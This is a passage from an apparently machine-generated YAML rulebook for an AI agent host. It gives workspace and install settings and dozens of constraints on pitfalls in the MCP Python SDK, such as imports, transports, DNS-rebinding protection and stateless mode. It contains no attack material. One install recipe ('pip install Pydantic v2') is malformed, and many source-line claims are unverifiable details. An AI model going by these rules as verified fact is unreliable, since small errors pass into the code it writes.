    conditional_entry_points:
      backtest:
        entry_point_name: run_backtest
        output_path: result.csv
      collector:
        entry_point_name: run_collector
        output_path: result.json
      factor:
        entry_point_name: run_factor
        output_path: result.parquet
      training:
        entry_point_name: run_training
        output_path: result.json
      serving:
        entry_point_name: run_server
        output_path: result.json
      research:
        entry_point_name: run_research
        output_path: result.json
    tail_template: "# === DO NOT MODIFY BELOW THIS LINE ===\nif __name__ == \"__main__\":\n    result = run_backtest()  #\
      \ implement above\n    from validate import enforce_validation\n    enforce_validation(result, output_path=\"{workspace}/result.csv\"\
      )\n# === END DO NOT MODIFY ==="
  host_adapter:
    target: openclaw
    timeout_seconds: 1800
    shell_operator_restriction: 'exec tool intercepts && / ; / | — never chain: ''pip install X && python Y''. Use separate
      exec calls.'
    install_recipes:
    - python3 -m pip install AnyIO
    - python3 -m pip install Pydantic v2
    - python3 -m pip install Starlette
    - python3 -m pip install zvt
    credential_injection: JoinQuant/QMT credentials require user-side '!' prefix shell login. Never hardcode credentials in
      generated scripts.
    path_resolution: '{workspace} resolves to ~/.openclaw/workspace/doramagic at execution time.'
    file_io_tooling: Use openclaw 'write' tool for .py/.sql files; 'exec' tool for python3 /absolute/path/script.py (absolute
      paths only).
constraints:
  fatal:
  - id: mcp-C-001
    when: When following README quickstart code at commit 3d7b311 to build an MCP server
    action: translate every `from mcp.server.fastmcp import FastMCP` line (≥26 occurrences in README at lines 147, 231, 293,
      324, 349, 419, 470, 572, 573, 600, 640, 665, 697, 830, 937, 974, 1017, 1211, 1255, 1297, 1410, 1457, 1504, 1565, 1602,
      1623) to `from mcp.server.mcpserver import MCPServer` and instantiate `MCPServer(...)` instead of `FastMCP(...)`; `mcp.server.fastmcp`
      package no longer exists
    severity: fatal
    kind: operational_lesson
    modality: must
    consequence: 'Copy-pasting README import statements raises ModuleNotFoundError: No module named ''mcp.server.fastmcp''
      immediately at import time, blocking any further work on the server before a single line of business logic runs'
    stage_ids:
    - server_setup
    derived_from_bd_id: pitfall-001 / BD-G01
  regular:
  - id: mcp-C-002
    when: When following README links or copying file paths referenced in the README at commit 3d7b311
    action: translate every `examples/fastmcp/*` and `fastmcp_quickstart.py` path reference (10 occurrences at README lines
      138, 144, 185, 191, 628, 2169, 2200, 2213, 2219, 2299) to `examples/mcpserver/*` and `mcpserver_quickstart.py` respectively
      before opening or running them
    severity: high
    kind: operational_lesson
    modality: must
    consequence: FileNotFoundError when opening referenced examples; copy-paste of `examples/fastmcp/icons_demo.py` style
      commands fails because the directory was renamed to `examples/mcpserver/`. Wastes setup time and erodes trust in documentation
    stage_ids:
    - server_setup
    derived_from_bd_id: pitfall-001 / BD-G01
  - id: mcp-C-003
    when: When binding streamable-http or SSE transport to any host other than 127.0.0.1, localhost, or ::1 (e.g. 0.0.0.0,
      public IP, container IP)
    action: explicitly pass `transport_security=TransportSecuritySettings(enable_dns_rebinding_protection=True, allowed_hosts=[...],
      allowed_origins=[...])` to MCPServer.streamable_http_app()/sse_app() — the auto-enable at lowlevel/server.py:579-585
      (streamable_http) and mcpserver/server.py:928-934 (sse) only fires for the three loopback strings
    severity: high
    kind: domain_rule
    modality: must
    consequence: Without transport_security, browser-based DNS-rebinding attackers can rebind a victim's DNS lookup to point
      at the MCP server's internal IP and execute tool calls with the victim's credentials. transport_security.py:41 confirms
      middleware default is enable_dns_rebinding_protection=False when security_settings is None
    stage_ids:
    - transport_select
    derived_from_bd_id: pitfall-002 / BD-016 / BD-G03
  - id: mcp-C-004
    when: When considering whether DNS-rebinding protection is on for a streamable-http or SSE deployment
    action: assume the framework auto-enables DNS-rebinding protection on the user's behalf — auto-enable narrowly fires only
      when `host in ('127.0.0.1', 'localhost', '::1')`, and the framework's default `MCPServer.run_streamable_http_async(host='127.0.0.1')`
      is what masks the gap during local development
    severity: high
    kind: claim_boundary
    modality: must_not
    consequence: Server author who validates locally (host='127.0.0.1' default → protection auto-on) and deploys to production
      behind 0.0.0.0 will silently lose Origin/Host validation. The exposure window is invisible because the local test suite
      still passes
    stage_ids:
    - transport_select
    derived_from_bd_id: BD-G03 / BD-016
  - id: mcp-C-005
    when: When deploying streamable-http with `stateless=True` (typically combined with `json_response=True` for K8s scaling)
    action: call `ctx.session.create_message()` (sampling), `ctx.session.elicit_form()`, `ctx.session.elicit_url()`, `ctx.session.elicit()`,
      or `ctx.session.list_roots()` from any tool / resource / prompt handler — all four raise `StatelessModeNotSupported`
      (RuntimeError subclass) at call time when self._stateless is True
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: Tool author writes/tests locally with stateful sessions, deploys stateless, and tools start raising StatelessModeNotSupported
      on first invocation in production. README recommends stateless config without flagging this incompatibility
    stage_ids:
    - server_to_client_capabilities
    derived_from_bd_id: pitfall-003 / BD-010
  - id: mcp-C-006
    when: When tool implementation needs server→client capabilities (sampling / elicitation / list_roots) but production target
      is K8s-style horizontal scaling
    action: either (a) deploy with `stateless=False` (stateful sessions, single-pod or sticky-session loadbalanced) so the
      bidirectional channel persists, or (b) refactor tools to remove all `ctx.session.create_message / elicit_form / elicit_url
      / list_roots` calls before enabling `stateless=True`
    severity: high
    kind: operational_lesson
    modality: must
    consequence: Without an explicit deployment-mode decision, tools that compile fine locally crash on first stateless invocation.
      Half-measures (e.g. `stateless=True` + tools that conditionally call sampling) leak the bug to runtime
    stage_ids:
    - server_to_client_capabilities
    - transport_select
    derived_from_bd_id: pitfall-003 / BD-010
  - id: mcp-C-007
    when: When configuring `StreamableHTTPSessionManager(stateless=True, ...)` for stateless production deployment
    action: pass `session_idle_timeout=<any positive value>` simultaneously — the constructor at streamable_http_manager.py:78
      raises `RuntimeError('session_idle_timeout is not supported in stateless mode')` before the manager is even returned,
      so the failure is at app boot
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: Server fails to start with a RuntimeError at session-manager construction. Trap is loud at boot but easy
      to introduce when copy-pasting from stateful examples that include session_idle_timeout for cleanup
    stage_ids:
    - transport_select
    derived_from_bd_id: pitfall-004
  - id: mcp-C-008
    when: When integrating `StreamableHTTPSessionManager` into a hot-reload framework (uvicorn --reload, ASGI lifespan reuse)
      or any lifecycle that re-invokes `manager.run()`
    action: instantiate a fresh `StreamableHTTPSessionManager(...)` on each lifecycle restart — never reuse the previous instance;
      `run()` is single-shot per instance and raises `RuntimeError('StreamableHTTPSessionManager .run() can only be called
      once per instance. Create a new instance if you need to run again.')` on the second call (streamable_http_manager.py:117-122)
    severity: high
    kind: domain_rule
    modality: must
    consequence: Server boots successfully on first start; second restart (via --reload, lifespan reload, container re-launch
      within same process) crashes opaquely with RuntimeError. The first crash typically appears mid-development and confuses
      devs because the symptom is delayed
    stage_ids:
    - transport_select
    derived_from_bd_id: pitfall-005 / BD-009
  - id: mcp-C-009
    when: Before calling `ctx.session.create_message(..., tools=[...], tool_choice=...)` from a server tool (sampling-with-tools)
    action: first call `ctx.session.check_client_capability(ClientCapabilities(sampling=SamplingCapability(tools=True)))`
      (or an equivalent capability gate) and short-circuit with a degraded response when it returns False — `validate_sampling_tools`
      at validation.py:29-46 raises `MCPError(code=INVALID_PARAMS, message='Client does not support sampling tools capability')`
      (-32602) when client did not advertise `sampling.tools`
    severity: medium
    kind: domain_rule
    modality: must
    consequence: Tool that unconditionally passes tools= to create_message will raise -32602 INVALID_PARAMS for any client
      that did not advertise sampling.tools capability — half of real clients today do not. Failure is at runtime, per-client,
      hard to reproduce in dev
    stage_ids:
    - server_to_client_capabilities
    derived_from_bd_id: pitfall-006
  - id: mcp-C-010
    when: When user code or external examples call the legacy `ctx.session.elicit(message, schema, ...)` method
    action: migrate the call to `ctx.session.elicit_form(message, schema, ...)` for structured form input or `ctx.session.elicit_url(message,
      url, elicitation_id, ...)` for OAuth / payment URL flow — `elicit()` at session.py:358-378 is documented as deprecated
      and is currently only a backward-compat wrapper around `elicit_form`
    severity: low
    kind: operational_lesson
    modality: should
    consequence: elicit() works today but is documented as deprecated and earmarked for removal. Code that does not migrate
      accumulates technical debt and will break on a future SDK version bump without further warning. URL-flow use cases that
      wrongly route through elicit() will be coerced to form-mode by elicit() since it forwards only to elicit_form
    stage_ids:
    - server_to_client_capabilities
    derived_from_bd_id: pitfall-007
  - id: mcp-C-011
    when: When registering a tool / resource / prompt with `@mcp.tool()`, `@mcp.resource(uri)` or `@mcp.prompt()`
    action: always invoke the decorator with parentheses — e.g. `@mcp.tool()` not `@mcp.tool` — the decorator factory at server.py:562-565
      / 682-686 explicitly checks `if callable(name)` and raises `TypeError('The @tool decorator was used incorrectly. Did
      you forget to call it? Use @tool() instead of @tool')` at decoration time
    severity: low
    kind: domain_rule
    modality: must
    consequence: Bare `@mcp.tool` (no parentheses) raises TypeError at module import — server cannot start. Loud failure but
      the message is non-obvious to first-time decorator users; pattern is also non-standard relative to many Python decorator
      libraries that allow bare usage
    stage_ids:
    - server_setup
    - three_primitives
    derived_from_bd_id: BD-G05
  - id: mcp-C-012
    when: When choosing between MCPServer (high-level decorator API) and Server (low-level handler API) for a new server
    action: mix the two API tiers at the same level — e.g. instantiate `Server` and then attach `MCPServer.tool()` decorators
      to it, or pass `on_call_tool=` to a low-level Server constructor while also using MCPServer-style ToolManager. MCPServer
      composes Server internally (mcpserver/server.py:148-200); choose one tier per server
    severity: high
    kind: architecture_guardrail
    modality: must_not
    consequence: Mixing decorator surfaces with constructor-injected handlers produces silent shadowing — a tool registered
      both ways may invoke only one path or partially register, breaking capability auto-derivation. No exception raised;
      the bug appears as missing tools at tools/list response
    stage_ids:
    - server_setup
    derived_from_bd_id: BD-001
  - id: mcp-C-013
    when: When deciding whether to expose data via Tool, Resource, or Prompt
    action: treat the three-way distinction as semantic — use Resource for read-only data with no side effects (REST GET analog),
      Tool for compute / side-effecting actions (action verbs), Prompt for reusable parametrized message templates the LLM
      can pick. Source enforces no boundary at runtime, so the consumer's discipline is the only safeguard
    severity: medium
    kind: operational_lesson
    modality: should
    consequence: 'Confusing the three primitives is documented as the #1 anti-pattern in README. A tool that reads-only data
      confuses LLM tool-selection heuristics; a resource that has side effects breaks client caching assumptions. Long-term
      debt in agent design that is hard to refactor once clients depend on the wrong primitive surface'
    stage_ids:
    - three_primitives
    derived_from_bd_id: BD-002
  - id: mcp-C-014
    when: When implementing a custom transport beyond stdio / SSE / streamable-http / WebSocket
    action: yield a `(read_stream, write_stream)` tuple from an `@asynccontextmanager` where streams match the Protocol[T]
      subclasses at `shared/_stream_protocols.py:18` (ReadStream) and `:38` (WriteStream) — there is NO formal Transport ABC
      to inherit from; the contract is structural typing
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: Custom transports that return raw asyncio streams or non-AnyIO MemoryObject streams will fail at type-checking
      and at runtime when ServerSession tries to .receive() / .send() with AnyIO-specific cancellation semantics. No explicit
      error message — failure mode is `AttributeError` or hung tasks
    stage_ids:
    - transport_select
    derived_from_bd_id: global_contracts[1]
  - id: mcp-C-015
    when: When using stdio transport for any payload that may contain newline characters (multi-line JSON values, embedded
      CR/LF in strings, large JSON-RPC payloads)
    action: ensure JSON-RPC messages are JSON-encoded with `ensure_ascii=False` AND that no embedded raw newline characters
      appear in the JSON serialization — stdio framing is line-delimited (`\n` separator at stdio.py:54,69), so any embedded
      `\n` in the wire bytes corrupts the message boundary
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Embedded raw newlines split a single JSON-RPC message into two lines on the wire, both of which fail JSON
      parse on the receiver. Symptom is intermittent 'parse error' responses; long payloads are at higher risk because they
      more often contain embedded line-breaks in escaped string values
    stage_ids:
    - transport_select
    derived_from_bd_id: BD-003
  - id: mcp-C-016
    when: When configuring SSE transport endpoint via `SseServerTransport(endpoint=...)`
    action: pass a relative path string only (e.g. `/messages/`) — the constructor at sse.py:103 explicitly raises `ValueError`
      if the endpoint contains `://` (absolute URL), starts with `//` (protocol-relative), or contains `?` / `#` (query /
      fragment)
    severity: high
    kind: domain_rule
    modality: must
    consequence: The relative-path enforcement is a CSRF / cross-origin defense — clients can only POST to the same origin
      that opened the SSE stream. Absolute URLs would let an attacker funnel POSTs to a different host. ValueError is raised
      at construction so the failure is at boot, not runtime
    stage_ids:
    - transport_select
    derived_from_bd_id: stage transport_select
  - id: mcp-C-017
    when: When generating or accepting `mcp-session-id` HTTP header values for streamable-http transport
    action: ensure session IDs match `SESSION_ID_PATTERN = r'^[\x21-\x7E]+$'` (visible ASCII only, one or more characters)
      — values containing whitespace, control characters, or non-ASCII bytes fail validation at streamable_http.py:64 and
      the request is rejected
    severity: medium
    kind: resource_boundary
    modality: must
    consequence: 'Custom session ID generators using UUIDs with hyphens are fine; generators using base64 with `=` padding
      or non-ASCII tokens fail validation. Symptom: requests rejected with 400 Bad Request. Trap is invisible until the first
      request with a non-conforming session ID hits the server'
    stage_ids:
    - transport_select
    derived_from_bd_id: stage transport_select
  - id: mcp-C-018
    when: When a streamable-http client sends a POST request to the MCP endpoint
    action: include both `application/json` AND `text/event-stream` in the `Accept` header (unless the server has `is_json_response_enabled=True`
      exclusively) — the Accept-header check at streamable_http.py:419 rejects requests that do not accept both content types
      because the server may respond with either single JSON or an SSE stream depending on response shape
    severity: medium
    kind: domain_rule
    modality: must
    consequence: Clients that accept only application/json get 406 Not Acceptable from any tool that returns notifications-then-response
      (which uses SSE). Trap is invisible to clients that test against tools returning single responses but breaks streaming
      tools
    stage_ids:
    - transport_select
    derived_from_bd_id: stage transport_select
  - id: mcp-C-019
    when: When implementing a Resource subclass for the high-level MCPServer
    action: implement async `def read(self) -> str | bytes` — the only stable user-facing abstract on the high-level Resource
      ABC at `src/mcp/server/mcpserver/resources/base.py:41` (uses `abc.abstractmethod`, NOT the `@abstractmethod` decorator
      imported in EventStore / experimental subsystem)
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: 'Subclasses missing read() raise TypeError at instantiation: ''Can''t instantiate abstract class X with abstract
      method read''. Loud failure but easy to miss when porting from non-async resource libraries'
    stage_ids:
    - three_primitives
    derived_from_bd_id: stage three_primitives
  - id: mcp-C-020
    when: When defining a ResourceTemplate with URI parameters like `weather://{city}/current`
    action: ensure URI template parameter names exactly match the function parameter names (excluding the Context parameter
      if present) — at templates.py:25 the template builder maps URI params to function args by name, mismatched names cause
      registration to fail or wrong URI parsing at runtime
    severity: high
    kind: domain_rule
    modality: must
    consequence: Mismatched param names produce either a registration-time error (if validation fires) or — worse — a tool
      that always receives None / KeyError on URI matching. Hard to diagnose without reading template source
    stage_ids:
    - three_primitives
    derived_from_bd_id: stage three_primitives
  - id: mcp-C-021
    when: When raising a custom exception from inside a Tool function to abort with a special protocol-level signal (OAuth
      flow, payment confirmation)
    action: raise `UrlElicitationRequiredError(elicitations=[...])` (shared/exceptions.py:61) — Tool.run at base.py:91-119
      explicitly re-raises this exception (does not wrap in ToolError) to preserve the dedicated -32042 (URL_ELICITATION_REQUIRED)
      JSON-RPC error code; any other exception type is wrapped into ToolError and converted to CallToolResult(is_error=True)
    severity: high
    kind: domain_rule
    modality: must
    consequence: Using a generic Exception or a custom subclass for OAuth abort means clients receive CallToolResult(is_error=True)
      with a generic ToolError message instead of the -32042 signal. Clients that key off -32042 to launch the URL flow will
      not detect the request
    stage_ids:
    - server_to_client_capabilities
    - three_primitives
    derived_from_bd_id: BD-007
  - id: mcp-C-022
    when: When relying on the framework to advertise a server capability (sampling / elicitation / list_roots / subscribe)
    action: manually edit the InitializeResult capabilities object hoping to advertise a capability without registering its
      handler — capabilities are AUTO-DERIVED from registered handlers at lowlevel/server.py:283-328 (e.g. registering an
      `on_list_tools` handler causes ToolsCapability to appear; not registering it means the capability is absent regardless
      of any other config)
    severity: high
    kind: architecture_guardrail
    modality: must_not
    consequence: Trying to declare a capability without a handler appears to succeed (no error), but the auto-derive overrides
      any manual setting at the next handshake. Server appears to advertise the capability but clients calling its methods
      get METHOD_NOT_FOUND
    stage_ids:
    - capability_negotiate
    derived_from_bd_id: BD-004
  - id: mcp-C-023
    when: When sending any non-Ping request to a freshly-connected MCP server before completing the initialize handshake
    action: send tool calls / resource reads / prompt fetches / completion requests / etc. — server enforces strict state
      machine `NotInitialized → Initializing → Initialized` at session.py:165-205 and raises `RuntimeError('Received request
      before initialization was complete')` for any non-Ping request prior to the client sending `notifications/initialized`.
      PingRequest is the only exempted method (session.py:190-192)
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: Pre-init requests crash the server with RuntimeError before any client logic can run. Clients written without
      strict initialize-then-request ordering hit this on first connection. Some debugging tools (curl directly into the JSON-RPC
      endpoint) trigger this trap
    stage_ids:
    - capability_negotiate
    derived_from_bd_id: BD-008
  - id: mcp-C-024
    when: When negotiating MCP protocol version between client and server
    action: use one of the four versions in `SUPPORTED_PROTOCOL_VERSIONS = ['2024-11-05', '2025-03-26', '2025-06-18', '2025-11-25']`
      (shared/version.py:1-3) — clients should send `LATEST_PROTOCOL_VERSION = '2025-11-25'` (types/_types.py:12); servers
      fall back to `LATEST_PROTOCOL_VERSION` when the requested version is not in the supported list (session.py:174-176);
      default negotiated version is `DEFAULT_NEGOTIATED_VERSION = '2025-03-26'` (types/_types.py:18)
    severity: high
    kind: domain_rule
    modality: must
    consequence: Hardcoding an unsupported version string (e.g. mistyped date, future version not yet released) causes the
      client-side check at client/session.py to raise RuntimeError('Unsupported protocol version from the server'). Server-side
      silent fallback to LATEST may surprise clients that requested an older version expecting it to be honored
    stage_ids:
    - capability_negotiate
    derived_from_bd_id: stage capability_negotiate
  - id: mcp-C-025
    when: When implementing client side and deciding whether to advertise sampling / elicitation / list_roots capabilities
    action: supply non-default callbacks for `sampling_callback`, `elicitation_callback`, `list_roots_callback` if and only
      if the client actually implements those capabilities — ClientSession.initialize at client/session.py:148-180 advertises
      capability iff `self._sampling_callback is not _default_sampling_callback` (sentinel-function comparison); supplying
      default callback = no advertisement
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: Supplying a custom callback that delegates back to the default — or any value-equal but identity-different
      sentinel — causes the capability to be advertised even though the client cannot actually fulfill it. Server tools will
      then send sampling requests that the client cannot serve
    stage_ids:
    - capability_negotiate
    derived_from_bd_id: stage capability_negotiate
  - id: mcp-C-026
    when: When designing a tool / resource / prompt handler that needs request-scoped or startup-scoped dependencies (DB pool,
      secrets, external API client)
    action: place startup-scoped dependencies in a user-supplied lifespan callable passed as `lifespan=` to MCPServer / Server
      constructor; access them via `ctx.request_context.lifespan_context.<field>` inside handler bodies. The default lifespan
      (lowlevel/server.py:87) yields {} so tools see nothing without explicit lifespan setup
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: Accessing ctx.request_context.lifespan_context fields that the default {} lifespan does not provide raises
      AttributeError or KeyError at first tool call. Beginners frequently put DB-connection setup at module top-level instead
      of in lifespan and lose proper async cleanup
    stage_ids:
    - lifespan_context
    derived_from_bd_id: stage lifespan_context
  - id: mcp-C-027
    when: When relying on Context auto-injection in a tool / resource / prompt handler
    action: annotate the parameter with type `Context` (or `Optional[Context]`, `Context[T1, T2]`) — find_context_parameter
      at context_injection.py:13 detects via `typing.get_type_hints(fn)`, NOT by parameter name. The parameter name does not
      have to be `ctx`
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: Handlers that rely on naming convention (e.g. `def my_tool(x, ctx)` without type annotation on ctx) do not
      get Context injected — ctx is None / unbound and any `ctx.method(...)` call raises AttributeError. Type-hint-stripped
      imports also break injection
    stage_ids:
    - lifespan_context
    - three_primitives
    derived_from_bd_id: stage lifespan_context
  - id: mcp-C-028
    when: When raising an exception from a Tool function that should be returned to the client as a tool-execution failure
      (not a transport-level protocol error)
    action: let the framework wrap the exception into `CallToolResult(is_error=True, content=[TextContent(text=str(e))])`
      at mcpserver/server.py:315-316 — do NOT manually convert the exception into a JSON-RPC error response. Tool exceptions
      are domain results; only `UrlElicitationRequiredError` is the deliberate exception (re-raised for -32042)
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: Manually raising MCPError or returning a JSON-RPC error from a tool conflates transport vs domain failures.
      Clients expecting partial output via CallToolResult.content lose visibility; clients tracking is_error flag get false
      negatives
    stage_ids:
    - three_primitives
    derived_from_bd_id: BD-006
  - id: mcp-C-029
    when: When implementing a Resource read handler (Resource.read or read-resource path)
    action: let internal exception details (database error messages, file system paths, API tokens) leak to the client via
      raised exceptions — read_resource error handling at mcpserver/server.py:437-460 catches all exceptions and re-raises
      as `ResourceError(...)` to scrub internals; custom Resource subclasses must follow the same discipline
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: Leaked internal details (file paths, DB error messages with table names, stack traces with secrets) widen
      the attack surface for any client that can call the resource. Defense-in-depth pattern is documented at mcpserver/server.py
      — custom code must preserve it
    stage_ids:
    - three_primitives
    derived_from_bd_id: stage three_primitives
  - id: mcp-C-030
    when: When connecting to an MCP server via stdio_client and the server requires API keys / secrets / custom env vars to
      operate
    action: 'explicitly pass `env={''CUSTOM_KEY'': ''...'', ...}` to stdio_client — `DEFAULT_INHERITED_ENV_VARS` at client/stdio.py:28-45
      only inherits 6 vars on Unix (HOME, LOGNAME, PATH, SHELL, TERM, USER) and 12 on Windows (APPDATA, HOMEDRIVE, HOMEPATH,
      LOCALAPPDATA, PATH, PATHEXT, PROCESSOR_ARCHITECTURE, SYSTEMDRIVE, SYSTEMROOT, TEMP, USERNAME, USERPROFILE); user-defined
      vars are dropped silently. Functions starting with `()` are skipped (Bash-export injection mitigation, line 62)'
    severity: high
    kind: resource_boundary
    modality: must
    consequence: Spawned MCP server starts but fails on first API call with 'API_KEY is None' or similar — secret was in caller
      env but never inherited. Common gotcha when migrating from a shell script that relied on full env inheritance
    stage_ids:
    - transport_select
    derived_from_bd_id: BD-017
  - id: mcp-C-031
    when: When designing a long-running MCP server that performs cleanup (flush logs, close DB, drain async tasks) on SIGTERM
      via stdio_client
    action: ensure cleanup completes within 2 seconds — `PROCESS_TERMINATION_TIMEOUT = 2.0s` at client/stdio.py:48 (used at
      lines 199-204) means the client will SIGKILL the server after 2 seconds of grace period regardless of cleanup state.
      Long cleanup paths (flush large buffers, await network shutdown) need to be either fast or pushed off-process
    severity: medium
    kind: resource_boundary
    modality: must
    consequence: Server cleanup that takes >2 seconds gets SIGKILL'd; in-flight writes may not flush, in-memory buffers are
      lost. Symptom is intermittent 'last operation lost' bugs after restart
    stage_ids:
    - transport_select
    derived_from_bd_id: BD-019
  - id: mcp-C-032
    when: When registering tools / resources / prompts and a name collision exists with a previously-registered primitive
    action: rely on duplicate-warn-and-keep behavior to update a registration — `ToolManager.add_tool` (and ResourceManager
      / PromptManager analogues) at tool_manager.py:60-64 logs a warning and keeps the EXISTING registration; the second call
      is silently dropped after the warning
    severity: medium
    kind: operational_lesson
    modality: should_not
    consequence: Hot-reload that re-registers updated tools assumes second registration replaces the first — actually the
      OLD version is kept and the new one is dropped. Behavior change appears to take effect (no error) but stale code keeps
      serving requests until process restart
    stage_ids:
    - server_setup
    - three_primitives
    derived_from_bd_id: BD-021
  - id: mcp-C-033
    when: When implementing a sampling tool that constructs `tool_use` / `tool_result` content blocks for the client LLM
    action: comply with SEP-1577 — `tool_result` messages must contain ONLY `tool_result` content blocks; each `tool_result`
      must be preceded by a message containing the matching `tool_use`; `tool_use_id` values must match between the tool_use
      and its tool_result. validate_tool_use_result_messages at validation.py:49 enforces this and raises if violated
    severity: medium
    kind: domain_rule
    modality: must
    consequence: Mixed-content messages (e.g. tool_result + text in the same message) or unmatched IDs cause validate_tool_use_result_messages
      to raise MCPError. Trap is at runtime per-call, not at registration
    stage_ids:
    - server_to_client_capabilities
    derived_from_bd_id: stage server_to_client_capabilities
  - id: mcp-C-034
    when: When wiring an MCP server into an existing async runtime that is NOT AnyIO (e.g. raw asyncio with custom cancellation,
      third-party event loops)
    action: use AnyIO primitives end-to-end — anyio.create_task_group, anyio.create_memory_object_stream(0), anyio.CancelScope
      — because Server.run uses anyio.create_task_group at lowlevel/server.py:392 and assumes AnyIO cancellation semantics.
      Mixing raw asyncio cancellation will leave handler tasks orphaned when transport closes
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: Raw asyncio code attached to MCP server may not respect anyio.CancelScope cancellation; on transport close,
      in-flight handlers continue running, leaking resources and producing inconsistent state. AnyIO's cancellation is structured;
      raw asyncio is not
    derived_from_bd_id: BD-011 / global_contracts[4]
  - id: mcp-C-035
    when: When deploying an MCP server that handles bursty traffic from a single high-volume client
    action: layer rate-limiting at the reverse-proxy or load-balancer level (nginx, Envoy, ALB) for streamable-http / SSE
      transports — the framework has NO built-in per-session rate-limiting (BD-G02). For stdio transports, no defense exists;
      restrict client trust
    severity: medium
    kind: operational_lesson
    modality: must
    consequence: Without external rate-limiting, a single misbehaving or malicious client can flood the anyio task group at
      lowlevel/server.py:392-410 (unbounded tg.start_soon) with messages until OS resource exhaustion. anyio memory streams
      have buffer size 0 (backpressure naturally) but task spawn is unbounded
    derived_from_bd_id: BD-G02
  - id: mcp-C-036
    when: When debugging client-side error responses from an MCP server
    action: assume `code=0` indicates a transport-level failure or that the server is unreachable — `code=0` is the framework's
      NON-STANDARD JSON-RPC code emitted at lowlevel/server.py:515 for any uncaught generic Exception inside a handler. JSON-RPC
      2.0 spec reserves `0` as undefined; client cannot disambiguate handler bug vs transport hiccup
    severity: medium
    kind: claim_boundary
    modality: must_not
    consequence: Client retry logic that treats code=0 as transient transport error retries forever against a server that
      is consistently bug-crashing in the handler. Real fix is server-side — client just sees an opaque error. Should be -32603
      (INTERNAL_ERROR) per spec
    derived_from_bd_id: BD-G04
  - id: mcp-C-037
    when: When the MCP server is hot-reloaded or its cancellation logic interacts with long-running handler tasks
    action: rely on AnyIO structured cancellation — RequestResponder at shared/session.py:60 is a context manager holding
      `anyio.CancelScope`; client `CancelledNotification` cancels the in-flight handler scope; transport close cancels the
      entire task group at lowlevel/server.py:415. Custom in-handler cancel handling must use anyio.CancelScope, not asyncio.CancelledError
      catch
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: Handlers that catch `asyncio.CancelledError` and ignore it leak past transport close — task group thinks
      they finished but they keep running. anyio.get_cancelled_exc_class() is the correct sentinel for cross-backend cancel
    derived_from_bd_id: global_contracts[5]
  - id: mcp-C-038
    when: When implementing a custom `EventStore` for streamable-http resumability
    action: implement both `async def store_event(stream_id, message) -> EventId` AND `async def replay_events_after(last_event_id,
      send_callback) -> StreamId | None` — the two @abstractmethod at streamable_http.py:85 and :98. EventStore is the single
      stable user-facing public ABC outside the experimental tasks subsystem
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: Subclasses missing either abstract method raise TypeError at instantiation. EventStore is the only stable
      abstract contract for resumability — partial implementation breaks Last-Event-ID replay across reconnects
    stage_ids:
    - transport_select
    derived_from_bd_id: stage transport_select
  - id: mcp-C-039
    when: When considering using the `experimental/tasks` subsystem (TaskStore + MessageQueue) for long-running async tools
    action: depend on the experimental tasks subsystem for production-critical workloads — the 9 @abstractmethod on TaskStore
      (shared/experimental/tasks/store.py) plus 7 on MessageQueue (message_queue.py) are explicitly marked experimental; API
      surface may change without backward-compat guarantees
    severity: medium
    kind: claim_boundary
    modality: should_not
    consequence: Production code built on TaskStore / MessageQueue may break on next SDK upgrade. The 16 abstract methods
      are the largest unstable surface in the SDK. Experimental status communicated by directory placement (src/mcp/shared/experimental/)
      — easy to miss
    derived_from_bd_id: stage server_setup
  - id: mcp-C-040
    when: When an SSE-based deployment uses resumability priming events (empty SSE data frames) for old-version clients
    action: gate priming-event emission on the negotiated `protocol_version >= '2025-11-25'` — the framework checks this at
      streamable_http.py:269-285 because old clients can't parse empty SSE data frames and would crash on receiving priming.
      Custom SSE extensions must follow the same gate
    severity: medium
    kind: domain_rule
    modality: must
    consequence: Sending priming events to a 2024-11-05 or 2025-03-26 client crashes the client-side SSE parser. Symptom is
      silent client disconnects on long-lived streams
    stage_ids:
    - transport_select
    derived_from_bd_id: BD-020
  - id: mcp-C-041
    when: When choosing a transport for a new MCP server deployment
    action: default to streamable-http for production (single endpoint, optional resumability via EventStore, mount-friendly
      under Starlette / FastAPI, supports stateless K8s scaling) and stdio for local AI host integration (Claude Desktop,
      Cursor, dev workflows). Avoid SSE for new deployments — its two-endpoint dance (GET stream + POST message) is harder
      to operate and is positioned as legacy in README §1244
    severity: medium
    kind: operational_lesson
    modality: should
    consequence: Choosing SSE for a new deployment incurs more operational complexity than streamable-http for no gain. Choosing
      streamable-http for local single-user dev is overkill — stdio is simpler and matches host-integration conventions
    stage_ids:
    - transport_select
    derived_from_bd_id: BD-005
  - id: mcp-C-042
    when: When estimating capability of an MCP server based on the SDK's bundled documentation and examples at commit 3d7b311
    action: claim 'README quickstart code is verified working' or 'all README import examples are runnable' — README contains
      26 broken `from mcp.server.fastmcp import FastMCP` import lines and 10 broken file-path references. Use `examples/snippets/servers/mcpserver_quickstart.py`
      as the authoritative working example instead
    severity: high
    kind: claim_boundary
    modality: must_not
    consequence: Claiming README is fully runnable misleads users who copy-paste and immediately hit ModuleNotFoundError.
      Trust in entire SDK documentation degrades
    stage_ids:
    - server_setup
    derived_from_bd_id: BD-G01
  - id: mcp-C-043
    when: When promising real-time bidirectional capabilities (sampling / elicitation / list_roots) to end users on a stateless
      production deployment
    action: advertise sampling, elicitation, or list_roots as available features when deploying with `stateless=True` — these
      capabilities ARE the persistent bidirectional channel and CANNOT degrade gracefully in stateless mode (StatelessModeNotSupported
      is raised loudly at call time, not silently downgraded)
    severity: high
    kind: claim_boundary
    modality: must_not
    consequence: Marketing or onboarding materials that say 'this MCP server can ask the LLM to think' / 'this server can
      prompt for OAuth' contradict the deployed stateless config. Users hit the runtime exception and lose trust
    stage_ids:
    - server_to_client_capabilities
    derived_from_bd_id: BD-010
  - id: mcp-C-044
    when: When deploying an MCP server to Windows and managing client-side stdio subprocess termination
